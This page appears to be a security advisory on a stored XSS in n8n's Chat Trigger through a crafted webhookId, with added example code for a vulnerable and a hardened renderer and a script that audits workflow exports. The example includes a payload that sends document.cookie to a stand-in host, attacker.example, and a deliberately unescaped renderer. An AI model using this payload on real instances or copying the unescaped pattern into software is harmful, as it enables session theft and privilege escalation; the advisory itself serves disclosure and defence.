js · n8n · Critical
n8n Chat Trigger XSS via webhookId Injection
An authenticated user with workflow edit access can inject arbitrary JavaScript into the Chat Trigger's generated page by setting a malicious webhookId.
What changed
The Chat Trigger node serves a generated chat page whose markup includes the node's webhookId. An authenticated user with workflow edit access can set a crafted webhookId on a Chat Trigger node, and because the value is reflected into that page without adequate validation or escaping, the attacker's JavaScript becomes part of the page. The payload is persisted in the workflow definition, so this is a stored XSS: when any logged-in user visits the chat URL, the injected code executes in the n8n origin with that visitor's session privileges. A workflow editor can therefore act as a more privileged user, including an owner or admin, simply by getting them to open the chat page.
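The following is an added illustration of the bug class described above, written for this page; it is not n8n's code and does not reproduce its actual template. It assumes the chat page hands the id to a client script through a `data-webhook-id` attribute and that legitimate ids are UUIDs; both are assumptions made for the example. The vulnerable renderer splices the stored value into the markup verbatim, and the hardened one validates the format before rendering and escapes for the attribute context regardless.

```javascript
// Added example: a workflow-controlled webhookId spliced into a generated
// page (vulnerable) beside a renderer that validates and escapes it.
// Not n8n's code; the data-webhook-id attribute and the UUID format are
// assumptions for the illustration.

// Constructed sample ids: what a workflow editor might store in webhookId.
const BENIGN_ID = '3f6c1e9a-2d4b-4f8e-9a1c-7b2e5d8f0a13';
const MALICIOUS_ID =
  '"><script>fetch("https://attacker.example/c?d="+encodeURIComponent(document.cookie))</script><x a="';

// Vulnerable: the stored value lands in the markup as-is. A value containing
// '">' closes the attribute and the tag, and everything after it is parsed as
// new HTML, here a fresh <script> element that runs in the n8n origin.
function renderChatPageVulnerable(webhookId) {
  return [
    '<!doctype html>',
    '<html><body>',
    '<div id="chat"></div>',
    `<script src="/assets/chat.js" data-webhook-id="${webhookId}"></script>`,
    '</body></html>',
  ].join('\n');
}

// Hardened, first line of defence: accept only the format the application
// generates itself. Anything that is not a UUID never reaches the template.
const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
function isValidWebhookId(value) {
  return typeof value === 'string' && UUID_RE.test(value);
}

// Hardened, second line of defence: escape for the attribute context anyway,
// so a future gap in validation still cannot break out of the quotes.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

function renderChatPageHardened(webhookId) {
  if (!isValidWebhookId(webhookId)) {
    throw new Error('webhookId is not a UUID; refusing to render chat page');
  }
  return [
    '<!doctype html>',
    '<html><body>',
    '<div id="chat"></div>',
    `<script src="/assets/chat.js" data-webhook-id="${escapeHtmlAttr(webhookId)}"></script>`,
    '</body></html>',
  ].join('\n');
}

// True when the rendered page contains a script element beyond the single one
// the template itself emits, i.e. the injection succeeded.
function containsInjectedScript(html) {
  return (html.match(/<script\b/gi) || []).length > 1;
}

// Stand-alone demonstration.
console.log('vulnerable + malicious id injected:',
  containsInjectedScript(renderChatPageVulnerable(MALICIOUS_ID)));
console.log('hardened + benign id:', renderChatPageHardened(BENIGN_ID).split('\n')[3]);
```

Validation alone would already close the hole described in the advisory, since a UUID cannot carry markup; the escaping step is kept because the attribute is the actual injection context, and defending the sink directly is what survives the next refactor of the callers.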
Who it affects
Any n8n instance on a version before the fixed releases listed below that uses the Chat Trigger node and grants workflow edit access to users who should not be able to run code in other users' sessions. A single-user instance where the only editor is also the only person who opens chat pages has no cross-user exposure, but the fix should still be applied.
What to do today
Upgrade to n8n 1.123.55, 2.25.7, or 2.26.2, or any later release. If an immediate upgrade is not possible, restrict workflow creation and editing to trusted users and disable the Chat Trigger node through the NODES_EXCLUDE environment variable; both are stop-gaps, since the underlying sink is only fixed by the upgrade.
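As an added interim check to accompany the mitigations above (this is not part of the advisory or of n8n), the script below scans an exported set of workflows for Chat Trigger nodes whose webhookId is not a UUID, which is the shape a crafted value would take. It assumes the export format n8n uses today (an array of workflows, each with a `nodes` array whose entries carry a top-level `type` and `webhookId`) and assumes the Chat Trigger's type name is `@n8n/n8n-nodes-langchain.chatTrigger`; both are assumptions and the sample export is constructed.

```javascript
// Added audit example, not n8n's code: flag Chat Trigger nodes whose
// webhookId does not look like a UUID in an exported workflow JSON document.
// Assumptions: export shape (array of workflows, nodes[] with top-level
// `type` and `webhookId`) and the Chat Trigger type name below.

const CHAT_TRIGGER_TYPE = '@n8n/n8n-nodes-langchain.chatTrigger'; // assumed type name
const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;

// Constructed sample export: one clean Chat Trigger, one with an injected id,
// and an unrelated node that must not be flagged.
const SAMPLE_EXPORT = JSON.stringify([
  {
    id: '1', name: 'Support chat',
    nodes: [
      { name: 'Chat', type: CHAT_TRIGGER_TYPE, webhookId: '3f6c1e9a-2d4b-4f8e-9a1c-7b2e5d8f0a13', parameters: {} },
      { name: 'Set fields', type: 'n8n-nodes-base.set', parameters: {} },
    ],
  },
  {
    id: '2', name: 'Suspicious',
    nodes: [
      { name: 'Chat', type: CHAT_TRIGGER_TYPE, webhookId: '"><script>alert(1)</script>', parameters: {} },
    ],
  },
]);

// Returns one finding per Chat Trigger node whose webhookId is missing or not
// a UUID. Accepts either a single workflow object or an array of them.
function findSuspiciousChatTriggers(exportJson) {
  const parsed = JSON.parse(exportJson);
  const workflows = Array.isArray(parsed) ? parsed : [parsed];
  const findings = [];
  for (const wf of workflows) {
    for (const node of wf.nodes || []) {
      if (node.type !== CHAT_TRIGGER_TYPE) continue;
      const id = node.webhookId;
      if (typeof id !== 'string' || !UUID_RE.test(id)) {
        findings.push({
          workflowId: wf.id,
          workflowName: wf.name,
          node: node.name,
          // Truncate so a payload cannot flood or spoof the report itself.
          webhookId: String(id).slice(0, 80),
        });
      }
    }
  }
  return findings;
}

// Stand-alone demonstration on the constructed export.
console.log(JSON.stringify(findSuspiciousChatTriggers(SAMPLE_EXPORT), null, 2));
```

Feed it the JSON written by `n8n export:workflow --all --output=workflows.json` instead of the constructed sample. Any finding deserves a look at who last edited that workflow, and the same type name the scanner matches on is what goes into NODES_EXCLUDE, as a JSON array string, if you choose to disable the node. A clean scan is only a point-in-time result: an editor can set a new value at any moment, so it does not substitute for the upgrade.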
Source
GitHub Advisory · n8n